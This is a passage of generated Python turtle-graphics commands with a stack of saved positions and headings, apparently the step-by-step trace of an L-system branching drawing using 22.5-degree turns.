right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((244.80,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((244.80,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((244.80,142.75)), setheading(22.5) ;
pu(), setposition((199.24,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((210.55,154.06), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((210.55,154.06)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((210.55,154.06), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((210.55,154.06)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((225.34,160.18), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.34,160.18)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((225.34,160.18), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.34,160.18)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((241.34,160.18), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((241.34,160.18)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((241.34,160.18), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((241.34,160.18)), setheading(0.0) ;
pu(), setposition((199.24,142.75)), setheading(22.5) ;
pu(), setposition((108.11,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((119.43,154.06), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((119.43,154.06), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.74,165.38)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.74,165.38)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((146.74,165.38), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((146.74,165.38)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((146.74,165.38), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((146.74,165.38)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((161.52,171.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((161.52,171.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((161.52,171.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((161.52,171.50)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((172.83,182.81), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((172.83,182.81)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((172.83,182.81), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((172.83,182.81)), setheading(45.0) ;
pu(), setposition((130.74,165.38)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((136.86,180.16), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.86,180.16)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((136.86,180.16), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.86,180.16)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((148.18,191.47), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.18,191.47)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((148.18,191.47), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.18,191.47)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((162.96,197.59), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.96,197.59)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((162.96,197.59), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.96,197.59)), setheading(22.5) ;
pu(), setposition((130.74,165.38)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((145.52,171.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.52,171.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((145.52,171.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.52,171.50)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((160.30,177.62)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((160.30,177.62)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((175.09,171.50), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((175.09,171.50)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((175.09,171.50), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((175.09,171.50)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((191.09,171.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.09,171.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((191.09,171.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.09,171.50)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((205.87,177.62), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((205.87,177.62)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((205.87,177.62), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((205.87,177.62)), setheading(22.5) ;
pu(), setposition((160.30,177.62)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((171.62,188.94), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.62,188.94)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((171.62,188.94), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.62,188.94)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((186.40,195.06), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((186.40,195.06)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((186.40,195.06), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((186.40,195.06)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((202.40,195.06), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((202.40,195.06)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((202.40,195.06), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((202.40,195.06)), setheading(0.0) ;
pu(), setposition((160.30,177.62)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((176.30,177.62), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.30,177.62)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((176.30,177.62), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.30,177.62)), setheading(0.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.30,177.62)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.30,177.62)), setheading(0.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((203.62,166.31), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.62,166.31)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((203.62,166.31), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.62,166.31)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((218.40,160.18), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.40,160.18)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((218.40,160.18), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.40,160.18)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((234.40,160.18), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((234.40,160.18)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((234.40,160.18), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((234.40,160.18)), setheading(0.0) ;
pu(), setposition((192.30,177.62)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((207.09,183.74), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.09,183.74)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((207.09,183.74), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.09,183.74)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((223.09,183.74), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((223.09,183.74)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((223.09,183.74), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((223.09,183.74)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((237.87,177.62), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((237.87,177.62)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((237.87,177.62), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((237.87,177.62)), setheading(337.5) ;
pu(), setposition((192.30,177.62)), setheading(0.0) ;
pu(), setposition((108.11,142.75)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((119.43,154.06), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((119.43,154.06), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.74,165.38)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.74,165.38)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((146.74,165.38), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((146.74,165.38)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((146.74,165.38), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((146.74,165.38)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((161.52,171.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((161.52,171.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((161.52,171.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((161.52,171.50)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((172.83,182.81), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((172.83,182.81)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((172.83,182.81), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((172.83,182.81)), setheading(45.0) ;
pu(), setposition((130.74,165.38)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((136.86,180.16), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.86,180.16)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((136.86,180.16), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.86,180.16)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((148.18,191.47), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.18,191.47)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((148.18,191.47), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.18,191.47)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((162.96,197.59), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.96,197.59)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0), ((162.96,197.59), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.96,197.59)), setheading(22.5) ;
pu(), setposition((130.74,165.38)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((142.05,176.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((142.05,176.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((142.05,176.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((142.05,176.69)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.37,188.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.37,188.00)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
